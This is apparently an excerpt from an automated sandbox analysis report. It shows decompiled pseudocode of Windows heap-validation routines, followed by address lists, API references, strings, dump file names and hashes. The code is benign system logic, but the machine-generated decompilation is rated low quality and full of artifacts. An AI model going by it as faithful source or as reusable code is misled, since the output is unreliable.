										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x6ac58748 - 1;
										if( *0x6ac58748 >= 1) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E6AB6B150();
												} else {
													E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E6AB6B150();
												__eflags =  *0x6ac57bc8 - _t446;
												if( *0x6ac57bc8 == _t446) {
													__eflags = 1;
													E6AC22073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E6AC2A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E6AB8A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E6AB8B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E6AB8A830(_t553, _v64, _v24);
								_t286 = E6AB87D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E6AB87D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E6AC21411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E6AB87D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E6AB87D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E6AC21411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E6AB9174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E6AB8B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E6AB87D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E6AC214FB(_t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E6AB899BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E6AB8A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E6AB9ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}

0x6ab8a309
0x6ab8a316
0x6ab8a319
0x6ab8a31d
0x6ab8a32d
0x6ab8a331
0x6abd1e0d
0x6abd1e10
0x6ab8a3cb
0x6ab8a3cb
0x6ab8a3bd
0x6ab8a3c3
0x6ab8a3c3
0x6ab8a33a
0x6abd1e17
0x6abd1e1b
0x6abd1e1d
0x6abd1e2f
0x6abd1e34
0x6abd1e36
0x6abd1e3c
0x6abd1e3c
0x6abd1e3c
0x6abd1e3c
0x6abd1e36
0x6abd1e42
0x6abd1e45
0x6abd1e47
0x6ab8a3f8
0x6ab8a3f8
0x6ab8a3fb
0x6ab8a3fd
0x6abd1e50
0x6ab8a403
0x6ab8a411
0x6ab8a411
0x6ab8a411
0x6ab8a41e
0x6ab8a420
0x6ab8a424
0x6ab8a427
0x6ab8a7c9
0x6ab8a7cd
0x6ab8a7d2
0x6ab8a7d9
0x6ab8a7e0
0x6ab8a7e3
0x6ab8a7ed
0x6ab8a7f3
0x6ab8a7f9
0x6ab8a7ff
0x6ab8a802
0x6ab8a807
0x6ab8a809
0x6ab8a809
0x6ab8a809
0x6ab8a80f
0x6ab8a80f
0x6ab8a812
0x6ab8a81c
0x6ab8a821
0x6ab8a824
0x6ab8a42d
0x6ab8a42d
0x6ab8a42d
0x6ab8a42d
0x6ab8a42d
0x6ab8a436
0x6ab8a43a
0x6ab8a609
0x6ab8a60d
0x6ab8a612
0x6ab8a616
0x6ab8a61a
0x6abd1e57
0x6abd1e59
0x00000000
0x00000000
0x6abd1e5f
0x6ab8a620
0x6ab8a627
0x6abd1e64
0x6abd1e66
0x6abd1e6c
0x6abd1e72
0x6abd1e76
0x6abd1e95
0x6abd1e9a
0x6abd1e78
0x6abd1e8d
0x6abd1e92
0x6abd1ea0
0x6abd1ea5
0x6abd1eaa
0x6abd1eb2
0x6abd1eb6
0x6abd1eb9
0x6abd1eb9
0x6abd1ebe
0x6abd1ec2
0x6abd1ec2
0x6abd1e66
0x6ab8a62d
0x6ab8a633
0x6ab8a636
0x6ab8a63a
0x6ab8a63c
0x6ab8a640
0x6ab8a642
0x6ab8a644
0x6ab8a644
0x6ab8a644
0x6ab8a64d
0x6ab8a64d
0x6ab8a651
0x6ab8a655
0x6abd1eca
0x6abd1ed1
0x00000000
0x00000000
0x6abd1ed7
0x00000000
0x6ab8a65b
0x6ab8a669
0x6ab8a66e
0x6ab8a670
0x00000000
0x00000000
0x6ab8a676
0x6ab8a67b
0x6ab8a680
0x6ab8a682
0x6abd1f1a
0x6ab8a688
0x6ab8a688
0x6ab8a688
0x6ab8a68a
0x6ab8a68d
0x6abd1f24
0x6abd1f2a
0x6abd1f31
0x6abd1f43
0x6abd1f43
0x6abd1f31
0x6ab8a693
0x6ab8a697
0x6ab8a69d
0x6ab8a6a0
0x6ab8a6a6
0x6ab8a6a8
0x6ab8a6a8
0x6ab8a6a8
0x6ab8a6a8
0x6ab8a6b2
0x6ab8a6b7
0x6ab8a6c1
0x6ab8a6c6
0x6ab8a6d2
0x6ab8a6d9
0x6ab8a6e3
0x6ab8a6e6
0x6ab8a6eb
0x6ab8a6ed
0x6ab8a6ed
0x6ab8a6ed
0x6ab8a6ed
0x6ab8a6f3
0x6ab8a6f8
0x6ab8a702
0x6ab8a70a
0x6ab8a70e
0x6ab8a71a
0x6ab8a71e
0x6abd1fcb
0x6abd1fcf
0x6abd1fdd
0x6abd1fe3
0x6abd1fe3
0x6ab8a724
0x6ab8a728
0x6ab8a72a
0x6ab8a72d
0x6ab8a737
0x6ab8a73a
0x6ab8a73c
0x6ab8a742
0x6ab8a748
0x6abd1f4d
0x6abd1f50
0x6abd1f56
0x6abd1f5c
0x6abd1f5f
0x6abd1f7e
0x6abd1f83
0x6abd1f61
0x6abd1f76
0x6abd1f7b
0x6abd1f89
0x6abd1f8e
0x6abd1f93
0x6abd1f94
0x6abd1f9a
0x6abd1f9c
0x6abd1f9e
0x6abd1fa1
0x6abd1fa1
0x6abd1fa6
0x6abd1fa6
0x6abd1f50
0x6ab8a74e
0x6ab8a751
0x6ab8a754
0x6ab8a75d
0x6ab8a75e
0x6ab8a762
0x6ab8a767
0x6abd1faf
0x6abd1fb0
0x6abd1fb9
0x6abd1fbe
0x6abd1fc2
0x6abd1fc2
0x6ab8a76d
0x6ab8a76d
0x6ab8a775
0x6ab8a778
0x6ab8a77d
0x6ab8a77d
0x6ab8a71e
0x6ab8a782
0x6ab8a787
0x6ab8a789
0x6abd1ff3
0x6ab8a78f
0x6ab8a78f
0x6ab8a78f
0x6ab8a791
0x6ab8a794
0x6abd1ffd
0x6abd2006
0x6abd200c
0x6abd2017
0x6abd2019
0x6abd2024
0x6abd2024
0x6abd2024
0x6abd2047
0x6abd2047
0x6abd200c
0x6ab8a79a
0x6ab8a79f
0x6ab8a7a4
0x6ab8a7a9
0x6ab8a7ab
0x6abd205a
0x6ab8a7b1
0x6ab8a7b1
0x6ab8a7b1
0x6ab8a7b3
0x6ab8a7b6
0x00000000
0x6ab8a7bc
0x6abd2066
0x6abd2068
0x6abd2073
0x6abd2073
0x6abd2073
0x6abd2078
0x6abd2079
0x6abd207d
0x00000000
0x6abd207d
0x6ab8a7b6
0x6ab8a440
0x6ab8a440
0x6ab8a440
0x6ab8a446
0x6ab8a44c
0x6ab8a44f
0x6ab8a453
0x6ab8a455
0x6abd20b3
0x6abd20b9
0x6abd20b9
0x6ab8a45d
0x6ab8a460
0x6ab8a464
0x6ab8a466
0x6ab8a46b
0x6ab8a46f
0x6ab8a471
0x6ab8a471
0x6ab8a471
0x6ab8a474
0x6ab8a479
0x6ab8a47d
0x6ab8a47f
0x6abd2229
0x6abd222f
0x6ab8a3c8
0x6ab8a3c8
0x6ab8a3ca
0x6ab8a3ca
0x00000000
0x6ab8a3ca
0x6abd2235
0x6abd223a
0x6abd223a
0x00000000
0x00000000
0x6abd2240
0x6abd2246
0x6abd224a
0x6abd2269
0x6abd226e
0x6abd224c
0x6abd2261
0x6abd2266
0x6abd2274
0x6abd2279
0x6abd227e
0x6abd2286
0x6abd2288
0x6abd228d
0x6abd228d
0x6abd2292
0x6abd2292
0x6abd2295
0x6abd2295
0x00000000
0x6abd2295
0x6ab8a485
0x6ab8a489
0x6ab8a48b
0x6ab8a48f
0x6ab8a493
0x6ab8a497
0x6ab8a49b
0x6ab8a4bb
0x6ab8a4bb
0x6ab8a4bd
0x6ab8a4ff
0x6ab8a4ff
0x6ab8a501
0x6ab8a505
0x6ab8a50f
0x6ab8a517
0x6ab8a51b
0x6ab8a527
0x6ab8a52b
0x6abd2182
0x6abd2185
0x6abd2193
0x6abd2199
0x6abd2199
0x6ab8a531
0x6ab8a535
0x6ab8a538
0x6ab8a548
0x6ab8a54b
0x6ab8a54d
0x6ab8a553
0x6ab8a559
0x6abd2100
0x6abd2103
0x6abd2109
0x6abd210f
0x6abd2112
0x6abd2131
0x6abd2136
0x6abd2114
0x6abd2129
0x6abd212e
0x6abd213c
0x6abd2141
0x6abd2147
0x6abd214d
0x6abd2151
0x6abd2154
0x6abd2154
0x6abd2159
0x6abd2159
0x6abd2103
0x6ab8a55f
0x6ab8a562
0x6ab8a565
0x6ab8a567
0x6abd2162
0x6ab8a56d
0x6ab8a574
0x6ab8a575
0x6ab8a579
0x6ab8a57e
0x6abd2169
0x6abd216a
0x6abd2170
0x6abd2175
0x6abd2179
0x6abd2179
0x6ab8a57e
0x6ab8a584
0x6ab8a58f
0x6ab8a58f
0x6ab8a52b
0x6ab8a5ad
0x6ab8a5bc
0x6ab8a5c1
0x6ab8a5c6
0x6ab8a5cb
0x6ab8a5cd
0x6abd21a9
0x6ab8a5d3
0x6ab8a5d3
0x6ab8a5d3
0x6ab8a5d5
0x6ab8a5d8
0x6abd21b3
0x6abd21bc
0x6abd21c2
0x6abd21cd
0x6abd21cf
0x6abd21da
0x6abd21da
0x6abd21da
0x6abd21f7
0x6abd21f7
0x6abd21c2
0x6ab8a5de
0x6ab8a5e3
0x6ab8a5e8
0x6ab8a5ea
0x6abd220a
0x6ab8a5f0
0x6ab8a5f0
0x6ab8a5f0
0x6ab8a5f2
0x6ab8a5f5
0x6abd2219
0x6abd221b
0x6abd208c
0x6abd208c
0x6abd208c
0x6abd2095
0x6abd2096
0x6abd2097
0x6abd2098
0x6abd20a4
0x6abd20a5
0x6abd20a9
0x6abd20a9
0x00000000
0x6ab8a5f5
0x6ab8a4bf
0x6ab8a4d3
0x6ab8a4d8
0x6ab8a4da
0x6abd1ede
0x6abd1ede
0x6abd1ee4
0x6abd1ee9
0x00000000
0x00000000
0x6abd1f07
0x00000000
0x6abd1f07
0x6ab8a4e0
0x6ab8a4e5
0x6ab8a4e7
0x6abd20cb
0x6ab8a4ed
0x6ab8a4ed
0x6ab8a4ed
0x6ab8a4f2
0x6ab8a4f5
0x6abd20d5
0x6abd20de
0x6abd20e4
0x6abd20f6
0x6abd20f6
0x6abd20e4
0x6ab8a4fb
0x00000000
0x6ab8a4fb
0x6ab8a4a1
0x6ab8a4a4
0x6ab8a4a8
0x00000000
0x00000000
0x6ab8a4aa
0x6ab8a4ac
0x00000000
0x00000000
0x6ab8a4b2
0x6ab8a4b5
0x00000000
0x00000000
0x00000000
0x6ab8a4b5
0x6ab8a43a
0x6ab8a340
0x6ab8a346
0x6ab8a600
0x00000000
0x6ab8a600
0x6ab8a34f
0x6ab8a351
0x6ab8a358
0x6ab8a3c6
0x00000000
0x6ab8a371
0x6ab8a37a
0x6ab8a37f
0x6ab8a382
0x6ab8a384
0x6ab8a394
0x00000000
0x6ab8a396
0x6ab8a399
0x6ab8a3a7
0x6ab8a3b0
0x6ab8a3b4
0x6ab8a3bb
0x6ab8a3d2
0x6ab8a3da
0x6ab8a3df
0x6ab8a3e1
0x6ab8a3e5
0x6ab8a3ea
0x6ab8a3f0
0x6ab8a3f0
0x6ab8a3e1
0x00000000
0x6ab8a3bb
0x6ab8a394

APIs

RtlGetCurrentServiceSessionId.1105(00000000,00004000), ref: 6AB8A4E0
RtlGetCurrentServiceSessionId.1105(?,-000000E8,?,?,?), ref: 6AB8A5C1
RtlGetCurrentServiceSessionId.1105(?,-000000E8,?,?,?), ref: 6AB8A5DE
RtlGetCurrentServiceSessionId.1105(?,00004000), ref: 6AB8A676
RtlGetCurrentServiceSessionId.1105 ref: 6AB8A782
RtlGetCurrentServiceSessionId.1105 ref: 6AB8A79A
RtlGetCurrentServiceSessionId.1105 ref: 6ABD2012
RtlGetCurrentServiceSessionId.1105 ref: 6ABD2061
RtlGetCurrentServiceSessionId.1105(?,-000000E8,?,?,?), ref: 6ABD2214

Strings

(LONG)FreeEntry->Size > 1, xrefs: 6ABD213C
(UCRBlock != NULL), xrefs: 6ABD1EA0
(!TrailingUCR), xrefs: 6ABD2274
((LONG)FreeEntry->Size > 1), xrefs: 6ABD1F89
HEAP[%wZ]: , xrefs: 6ABD1E88, 6ABD1F71, 6ABD2124, 6ABD225C
HEAP: , xrefs: 6ABD1E95, 6ABD1F7E, 6ABD2131, 6ABD2269

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentServiceSession
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 1007659313-523794902
Opcode ID: d759e9d02a5e1613101d8a0a6ac1490fd70b9876ab47f191492e33bf93821da8
Instruction ID: d828e59f11cc135b92bd9e9cb9315adfe6f6793048edd93f636360f28f1a4a69
Opcode Fuzzy Hash: d759e9d02a5e1613101d8a0a6ac1490fd70b9876ab47f191492e33bf93821da8
Instruction Fuzzy Hash: A342DCB16097C19FC715CF28C488A2ABBE5FF85308F06496DF4958B292DF34D981EB52

Uniqueness

Uniqueness Score: -1.00%

Function 6AC24AEF, Relevance: 47.8, APIs: 18, Strings: 9, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E6AC24AEF(signed int __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				signed int _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E6AB6B150();
						} else {
							E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E6AB6B150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E6AB6B150();
					} else {
						E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E6AC1FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E6AB6B150();
						} else {
							E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E6AB6B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E6AB6B150();
								} else {
									E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E6AB6B150();
									} else {
										E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E6AB6B150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E6AC1FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E6AB6B150();
										} else {
											E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E6ABBD540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E6AB6B150();
								} else {
									E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E6AC2A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E6AB8E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
